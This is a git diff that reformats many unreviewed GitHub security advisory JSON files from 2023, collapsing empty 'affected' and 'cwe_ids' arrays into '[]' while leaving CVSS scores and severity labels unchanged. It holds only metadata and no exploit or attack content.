"ADVISORY", diff --git a/advisories/unreviewed/2023/01/GHSA-fv3g-rc7m-jwc4/GHSA-fv3g-rc7m-jwc4.json b/advisories/unreviewed/2023/01/GHSA-fv3g-rc7m-jwc4/GHSA-fv3g-rc7m-jwc4.json index 38422d417b6..13926c32055 100644 --- a/advisories/unreviewed/2023/01/GHSA-fv3g-rc7m-jwc4/GHSA-fv3g-rc7m-jwc4.json +++ b/advisories/unreviewed/2023/01/GHSA-fv3g-rc7m-jwc4/GHSA-fv3g-rc7m-jwc4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2023/01/GHSA-j282-vg3j-rc2j/GHSA-j282-vg3j-rc2j.json b/advisories/unreviewed/2023/01/GHSA-j282-vg3j-rc2j/GHSA-j282-vg3j-rc2j.json index e539616b634..c855abebda0 100644 --- a/advisories/unreviewed/2023/01/GHSA-j282-vg3j-rc2j/GHSA-j282-vg3j-rc2j.json +++ b/advisories/unreviewed/2023/01/GHSA-j282-vg3j-rc2j/GHSA-j282-vg3j-rc2j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/01/GHSA-j6g3-v6fc-9q9c/GHSA-j6g3-v6fc-9q9c.json b/advisories/unreviewed/2023/01/GHSA-j6g3-v6fc-9q9c/GHSA-j6g3-v6fc-9q9c.json index 576ee025a9e..b76d6102358 100644 --- a/advisories/unreviewed/2023/01/GHSA-j6g3-v6fc-9q9c/GHSA-j6g3-v6fc-9q9c.json +++ b/advisories/unreviewed/2023/01/GHSA-j6g3-v6fc-9q9c/GHSA-j6g3-v6fc-9q9c.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/01/GHSA-jfw7-2fxj-fw3j/GHSA-jfw7-2fxj-fw3j.json b/advisories/unreviewed/2023/01/GHSA-jfw7-2fxj-fw3j/GHSA-jfw7-2fxj-fw3j.json index 8d91d969bf8..2c8e9daef8a 100644 --- a/advisories/unreviewed/2023/01/GHSA-jfw7-2fxj-fw3j/GHSA-jfw7-2fxj-fw3j.json +++ b/advisories/unreviewed/2023/01/GHSA-jfw7-2fxj-fw3j/GHSA-jfw7-2fxj-fw3j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/01/GHSA-jj77-6h6h-gh59/GHSA-jj77-6h6h-gh59.json b/advisories/unreviewed/2023/01/GHSA-jj77-6h6h-gh59/GHSA-jj77-6h6h-gh59.json index 9a9895785dc..267cf05c2c4 100644 --- a/advisories/unreviewed/2023/01/GHSA-jj77-6h6h-gh59/GHSA-jj77-6h6h-gh59.json +++ b/advisories/unreviewed/2023/01/GHSA-jj77-6h6h-gh59/GHSA-jj77-6h6h-gh59.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/01/GHSA-jv5f-jx6c-cc8h/GHSA-jv5f-jx6c-cc8h.json b/advisories/unreviewed/2023/01/GHSA-jv5f-jx6c-cc8h/GHSA-jv5f-jx6c-cc8h.json index ccb0a290d26..d928f510857 100644 --- a/advisories/unreviewed/2023/01/GHSA-jv5f-jx6c-cc8h/GHSA-jv5f-jx6c-cc8h.json +++ b/advisories/unreviewed/2023/01/GHSA-jv5f-jx6c-cc8h/GHSA-jv5f-jx6c-cc8h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/01/GHSA-mv36-8276-2729/GHSA-mv36-8276-2729.json b/advisories/unreviewed/2023/01/GHSA-mv36-8276-2729/GHSA-mv36-8276-2729.json index bf9cc6aa516..c7a511fa986 100644 --- a/advisories/unreviewed/2023/01/GHSA-mv36-8276-2729/GHSA-mv36-8276-2729.json +++ b/advisories/unreviewed/2023/01/GHSA-mv36-8276-2729/GHSA-mv36-8276-2729.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2023/01/GHSA-rcxh-cxjx-w475/GHSA-rcxh-cxjx-w475.json b/advisories/unreviewed/2023/01/GHSA-rcxh-cxjx-w475/GHSA-rcxh-cxjx-w475.json index 60eb005ad34..26ff1282ad0 100644 --- a/advisories/unreviewed/2023/01/GHSA-rcxh-cxjx-w475/GHSA-rcxh-cxjx-w475.json +++ b/advisories/unreviewed/2023/01/GHSA-rcxh-cxjx-w475/GHSA-rcxh-cxjx-w475.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/01/GHSA-vqcf-fq86-9m4x/GHSA-vqcf-fq86-9m4x.json b/advisories/unreviewed/2023/01/GHSA-vqcf-fq86-9m4x/GHSA-vqcf-fq86-9m4x.json index 4780f2e04d7..f9abd042c5b 100644 --- a/advisories/unreviewed/2023/01/GHSA-vqcf-fq86-9m4x/GHSA-vqcf-fq86-9m4x.json +++ b/advisories/unreviewed/2023/01/GHSA-vqcf-fq86-9m4x/GHSA-vqcf-fq86-9m4x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2023/01/GHSA-vrj8-2xrx-wpr6/GHSA-vrj8-2xrx-wpr6.json b/advisories/unreviewed/2023/01/GHSA-vrj8-2xrx-wpr6/GHSA-vrj8-2xrx-wpr6.json index e72a3b844da..f22923eb93e 100644 --- a/advisories/unreviewed/2023/01/GHSA-vrj8-2xrx-wpr6/GHSA-vrj8-2xrx-wpr6.json +++ b/advisories/unreviewed/2023/01/GHSA-vrj8-2xrx-wpr6/GHSA-vrj8-2xrx-wpr6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/01/GHSA-wq58-84g7-3hwg/GHSA-wq58-84g7-3hwg.json b/advisories/unreviewed/2023/01/GHSA-wq58-84g7-3hwg/GHSA-wq58-84g7-3hwg.json index 80dcbd73e60..2b7ec977560 100644 --- a/advisories/unreviewed/2023/01/GHSA-wq58-84g7-3hwg/GHSA-wq58-84g7-3hwg.json +++ b/advisories/unreviewed/2023/01/GHSA-wq58-84g7-3hwg/GHSA-wq58-84g7-3hwg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/01/GHSA-wrf9-6jf3-2w3c/GHSA-wrf9-6jf3-2w3c.json b/advisories/unreviewed/2023/01/GHSA-wrf9-6jf3-2w3c/GHSA-wrf9-6jf3-2w3c.json index dd8430dc40f..2411eff02af 100644 --- a/advisories/unreviewed/2023/01/GHSA-wrf9-6jf3-2w3c/GHSA-wrf9-6jf3-2w3c.json +++ b/advisories/unreviewed/2023/01/GHSA-wrf9-6jf3-2w3c/GHSA-wrf9-6jf3-2w3c.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/03/GHSA-2pff-393p-j223/GHSA-2pff-393p-j223.json b/advisories/unreviewed/2023/03/GHSA-2pff-393p-j223/GHSA-2pff-393p-j223.json index 8fffed1b13c..6f56126ad22 100644 --- a/advisories/unreviewed/2023/03/GHSA-2pff-393p-j223/GHSA-2pff-393p-j223.json +++ b/advisories/unreviewed/2023/03/GHSA-2pff-393p-j223/GHSA-2pff-393p-j223.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/03/GHSA-2rcf-2963-c47m/GHSA-2rcf-2963-c47m.json b/advisories/unreviewed/2023/03/GHSA-2rcf-2963-c47m/GHSA-2rcf-2963-c47m.json index d1f4e304cc7..3dba5680229 100644 --- a/advisories/unreviewed/2023/03/GHSA-2rcf-2963-c47m/GHSA-2rcf-2963-c47m.json +++ b/advisories/unreviewed/2023/03/GHSA-2rcf-2963-c47m/GHSA-2rcf-2963-c47m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2023/03/GHSA-3cw2-x5r6-wgmh/GHSA-3cw2-x5r6-wgmh.json b/advisories/unreviewed/2023/03/GHSA-3cw2-x5r6-wgmh/GHSA-3cw2-x5r6-wgmh.json index 452d27d79d1..f5235f5a6c5 100644 --- a/advisories/unreviewed/2023/03/GHSA-3cw2-x5r6-wgmh/GHSA-3cw2-x5r6-wgmh.json +++ b/advisories/unreviewed/2023/03/GHSA-3cw2-x5r6-wgmh/GHSA-3cw2-x5r6-wgmh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/03/GHSA-3f3v-9mp5-jfjc/GHSA-3f3v-9mp5-jfjc.json b/advisories/unreviewed/2023/03/GHSA-3f3v-9mp5-jfjc/GHSA-3f3v-9mp5-jfjc.json index 6ab81c87522..d32199bd332 100644 --- a/advisories/unreviewed/2023/03/GHSA-3f3v-9mp5-jfjc/GHSA-3f3v-9mp5-jfjc.json +++ b/advisories/unreviewed/2023/03/GHSA-3f3v-9mp5-jfjc/GHSA-3f3v-9mp5-jfjc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/03/GHSA-3vcj-x75g-g7r9/GHSA-3vcj-x75g-g7r9.json b/advisories/unreviewed/2023/03/GHSA-3vcj-x75g-g7r9/GHSA-3vcj-x75g-g7r9.json index 979a747682c..aafe115a858 100644 --- a/advisories/unreviewed/2023/03/GHSA-3vcj-x75g-g7r9/GHSA-3vcj-x75g-g7r9.json +++ b/advisories/unreviewed/2023/03/GHSA-3vcj-x75g-g7r9/GHSA-3vcj-x75g-g7r9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/03/GHSA-4j4m-9f4v-qg65/GHSA-4j4m-9f4v-qg65.json b/advisories/unreviewed/2023/03/GHSA-4j4m-9f4v-qg65/GHSA-4j4m-9f4v-qg65.json index 8fbd1fb3537..288b6b4d0c8 100644 --- a/advisories/unreviewed/2023/03/GHSA-4j4m-9f4v-qg65/GHSA-4j4m-9f4v-qg65.json +++ b/advisories/unreviewed/2023/03/GHSA-4j4m-9f4v-qg65/GHSA-4j4m-9f4v-qg65.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/03/GHSA-4ww6-5q5c-2gc5/GHSA-4ww6-5q5c-2gc5.json b/advisories/unreviewed/2023/03/GHSA-4ww6-5q5c-2gc5/GHSA-4ww6-5q5c-2gc5.json index 1627cfb3a24..8f8f41b10ca 100644 --- a/advisories/unreviewed/2023/03/GHSA-4ww6-5q5c-2gc5/GHSA-4ww6-5q5c-2gc5.json +++ b/advisories/unreviewed/2023/03/GHSA-4ww6-5q5c-2gc5/GHSA-4ww6-5q5c-2gc5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/03/GHSA-5cgp-g38q-m4xj/GHSA-5cgp-g38q-m4xj.json b/advisories/unreviewed/2023/03/GHSA-5cgp-g38q-m4xj/GHSA-5cgp-g38q-m4xj.json index cc82f49e08f..d91ea18f48c 100644 --- a/advisories/unreviewed/2023/03/GHSA-5cgp-g38q-m4xj/GHSA-5cgp-g38q-m4xj.json +++ b/advisories/unreviewed/2023/03/GHSA-5cgp-g38q-m4xj/GHSA-5cgp-g38q-m4xj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/03/GHSA-5fmq-fmjj-gvcc/GHSA-5fmq-fmjj-gvcc.json b/advisories/unreviewed/2023/03/GHSA-5fmq-fmjj-gvcc/GHSA-5fmq-fmjj-gvcc.json index 061519422d3..bcf26708161 100644 --- a/advisories/unreviewed/2023/03/GHSA-5fmq-fmjj-gvcc/GHSA-5fmq-fmjj-gvcc.json +++ b/advisories/unreviewed/2023/03/GHSA-5fmq-fmjj-gvcc/GHSA-5fmq-fmjj-gvcc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2023/03/GHSA-5mh2-xjxr-6c3g/GHSA-5mh2-xjxr-6c3g.json b/advisories/unreviewed/2023/03/GHSA-5mh2-xjxr-6c3g/GHSA-5mh2-xjxr-6c3g.json index f5578311a49..2403bd58650 100644 --- a/advisories/unreviewed/2023/03/GHSA-5mh2-xjxr-6c3g/GHSA-5mh2-xjxr-6c3g.json +++ b/advisories/unreviewed/2023/03/GHSA-5mh2-xjxr-6c3g/GHSA-5mh2-xjxr-6c3g.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/03/GHSA-5wq5-p8x3-fm66/GHSA-5wq5-p8x3-fm66.json b/advisories/unreviewed/2023/03/GHSA-5wq5-p8x3-fm66/GHSA-5wq5-p8x3-fm66.json index ff4500ba655..d03589e1643 100644 --- a/advisories/unreviewed/2023/03/GHSA-5wq5-p8x3-fm66/GHSA-5wq5-p8x3-fm66.json +++ b/advisories/unreviewed/2023/03/GHSA-5wq5-p8x3-fm66/GHSA-5wq5-p8x3-fm66.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/03/GHSA-72mj-647x-f2hj/GHSA-72mj-647x-f2hj.json b/advisories/unreviewed/2023/03/GHSA-72mj-647x-f2hj/GHSA-72mj-647x-f2hj.json index aca8c315f3b..28dd047ef35 100644 --- a/advisories/unreviewed/2023/03/GHSA-72mj-647x-f2hj/GHSA-72mj-647x-f2hj.json +++ b/advisories/unreviewed/2023/03/GHSA-72mj-647x-f2hj/GHSA-72mj-647x-f2hj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/03/GHSA-78cg-rc3q-pv8q/GHSA-78cg-rc3q-pv8q.json b/advisories/unreviewed/2023/03/GHSA-78cg-rc3q-pv8q/GHSA-78cg-rc3q-pv8q.json index 522876caf02..3ad642b5d93 100644 --- a/advisories/unreviewed/2023/03/GHSA-78cg-rc3q-pv8q/GHSA-78cg-rc3q-pv8q.json +++ b/advisories/unreviewed/2023/03/GHSA-78cg-rc3q-pv8q/GHSA-78cg-rc3q-pv8q.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/03/GHSA-7g2w-7rc7-vmrj/GHSA-7g2w-7rc7-vmrj.json b/advisories/unreviewed/2023/03/GHSA-7g2w-7rc7-vmrj/GHSA-7g2w-7rc7-vmrj.json index 748ad16cdd3..3d72c33fce7 100644 --- a/advisories/unreviewed/2023/03/GHSA-7g2w-7rc7-vmrj/GHSA-7g2w-7rc7-vmrj.json +++ b/advisories/unreviewed/2023/03/GHSA-7g2w-7rc7-vmrj/GHSA-7g2w-7rc7-vmrj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/03/GHSA-83jj-vw5q-9gvm/GHSA-83jj-vw5q-9gvm.json b/advisories/unreviewed/2023/03/GHSA-83jj-vw5q-9gvm/GHSA-83jj-vw5q-9gvm.json index c6223dcf5b7..ac14f9f3957 100644 --- a/advisories/unreviewed/2023/03/GHSA-83jj-vw5q-9gvm/GHSA-83jj-vw5q-9gvm.json +++ b/advisories/unreviewed/2023/03/GHSA-83jj-vw5q-9gvm/GHSA-83jj-vw5q-9gvm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2023/03/GHSA-8c76-33c3-g76f/GHSA-8c76-33c3-g76f.json b/advisories/unreviewed/2023/03/GHSA-8c76-33c3-g76f/GHSA-8c76-33c3-g76f.json index 4b590c49f94..89fe7dc837d 100644 --- a/advisories/unreviewed/2023/03/GHSA-8c76-33c3-g76f/GHSA-8c76-33c3-g76f.json +++ b/advisories/unreviewed/2023/03/GHSA-8c76-33c3-g76f/GHSA-8c76-33c3-g76f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/03/GHSA-8cg9-vhpj-3cpf/GHSA-8cg9-vhpj-3cpf.json b/advisories/unreviewed/2023/03/GHSA-8cg9-vhpj-3cpf/GHSA-8cg9-vhpj-3cpf.json index e2ef19b81e5..b5d70417698 100644 --- a/advisories/unreviewed/2023/03/GHSA-8cg9-vhpj-3cpf/GHSA-8cg9-vhpj-3cpf.json +++ b/advisories/unreviewed/2023/03/GHSA-8cg9-vhpj-3cpf/GHSA-8cg9-vhpj-3cpf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/03/GHSA-8p34-3wpq-4497/GHSA-8p34-3wpq-4497.json b/advisories/unreviewed/2023/03/GHSA-8p34-3wpq-4497/GHSA-8p34-3wpq-4497.json index 724e6912228..1804c7e075b 100644 --- a/advisories/unreviewed/2023/03/GHSA-8p34-3wpq-4497/GHSA-8p34-3wpq-4497.json +++ b/advisories/unreviewed/2023/03/GHSA-8p34-3wpq-4497/GHSA-8p34-3wpq-4497.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2023/03/GHSA-945w-m377-8wgf/GHSA-945w-m377-8wgf.json b/advisories/unreviewed/2023/03/GHSA-945w-m377-8wgf/GHSA-945w-m377-8wgf.json index 1cba8816e96..6eed2d8f80b 100644 --- a/advisories/unreviewed/2023/03/GHSA-945w-m377-8wgf/GHSA-945w-m377-8wgf.json +++ b/advisories/unreviewed/2023/03/GHSA-945w-m377-8wgf/GHSA-945w-m377-8wgf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/03/GHSA-9fh7-6w63-mwj7/GHSA-9fh7-6w63-mwj7.json b/advisories/unreviewed/2023/03/GHSA-9fh7-6w63-mwj7/GHSA-9fh7-6w63-mwj7.json index bdcf8a83387..104bc46b414 100644 --- a/advisories/unreviewed/2023/03/GHSA-9fh7-6w63-mwj7/GHSA-9fh7-6w63-mwj7.json +++ b/advisories/unreviewed/2023/03/GHSA-9fh7-6w63-mwj7/GHSA-9fh7-6w63-mwj7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/03/GHSA-9p7v-69x8-m2cj/GHSA-9p7v-69x8-m2cj.json b/advisories/unreviewed/2023/03/GHSA-9p7v-69x8-m2cj/GHSA-9p7v-69x8-m2cj.json index d4bb0089c06..6d7239ff69e 100644 --- a/advisories/unreviewed/2023/03/GHSA-9p7v-69x8-m2cj/GHSA-9p7v-69x8-m2cj.json +++ b/advisories/unreviewed/2023/03/GHSA-9p7v-69x8-m2cj/GHSA-9p7v-69x8-m2cj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/03/GHSA-c856-8gm2-wg44/GHSA-c856-8gm2-wg44.json b/advisories/unreviewed/2023/03/GHSA-c856-8gm2-wg44/GHSA-c856-8gm2-wg44.json index f41a3f07160..feb14f80d6c 100644 --- a/advisories/unreviewed/2023/03/GHSA-c856-8gm2-wg44/GHSA-c856-8gm2-wg44.json +++ b/advisories/unreviewed/2023/03/GHSA-c856-8gm2-wg44/GHSA-c856-8gm2-wg44.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/03/GHSA-c8pc-w5xr-hrhp/GHSA-c8pc-w5xr-hrhp.json b/advisories/unreviewed/2023/03/GHSA-c8pc-w5xr-hrhp/GHSA-c8pc-w5xr-hrhp.json index 5c43bf3885e..840ab5777d5 100644 --- a/advisories/unreviewed/2023/03/GHSA-c8pc-w5xr-hrhp/GHSA-c8pc-w5xr-hrhp.json +++ b/advisories/unreviewed/2023/03/GHSA-c8pc-w5xr-hrhp/GHSA-c8pc-w5xr-hrhp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/03/GHSA-c8vp-x3mr-73x8/GHSA-c8vp-x3mr-73x8.json b/advisories/unreviewed/2023/03/GHSA-c8vp-x3mr-73x8/GHSA-c8vp-x3mr-73x8.json index 2f5f75d0777..bc00b9dac98 100644 --- a/advisories/unreviewed/2023/03/GHSA-c8vp-x3mr-73x8/GHSA-c8vp-x3mr-73x8.json +++ b/advisories/unreviewed/2023/03/GHSA-c8vp-x3mr-73x8/GHSA-c8vp-x3mr-73x8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2023/03/GHSA-cp9w-3995-396m/GHSA-cp9w-3995-396m.json b/advisories/unreviewed/2023/03/GHSA-cp9w-3995-396m/GHSA-cp9w-3995-396m.json index 084ae771859..e8a8b7e2d78 100644 --- a/advisories/unreviewed/2023/03/GHSA-cp9w-3995-396m/GHSA-cp9w-3995-396m.json +++ b/advisories/unreviewed/2023/03/GHSA-cp9w-3995-396m/GHSA-cp9w-3995-396m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2023/03/GHSA-cw45-5qrw-cf7x/GHSA-cw45-5qrw-cf7x.json b/advisories/unreviewed/2023/03/GHSA-cw45-5qrw-cf7x/GHSA-cw45-5qrw-cf7x.json index 224b3b68ab5..c1cc7180ae1 100644 --- a/advisories/unreviewed/2023/03/GHSA-cw45-5qrw-cf7x/GHSA-cw45-5qrw-cf7x.json +++ b/advisories/unreviewed/2023/03/GHSA-cw45-5qrw-cf7x/GHSA-cw45-5qrw-cf7x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/03/GHSA-f282-xv35-jqp9/GHSA-f282-xv35-jqp9.json b/advisories/unreviewed/2023/03/GHSA-f282-xv35-jqp9/GHSA-f282-xv35-jqp9.json index f5fc8b5fe54..e7061dfa96c 100644 --- a/advisories/unreviewed/2023/03/GHSA-f282-xv35-jqp9/GHSA-f282-xv35-jqp9.json +++ b/advisories/unreviewed/2023/03/GHSA-f282-xv35-jqp9/GHSA-f282-xv35-jqp9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/03/GHSA-f7pp-q7rc-gvmc/GHSA-f7pp-q7rc-gvmc.json b/advisories/unreviewed/2023/03/GHSA-f7pp-q7rc-gvmc/GHSA-f7pp-q7rc-gvmc.json index cecf51528fa..9224b198e0c 100644 --- a/advisories/unreviewed/2023/03/GHSA-f7pp-q7rc-gvmc/GHSA-f7pp-q7rc-gvmc.json +++ b/advisories/unreviewed/2023/03/GHSA-f7pp-q7rc-gvmc/GHSA-f7pp-q7rc-gvmc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": 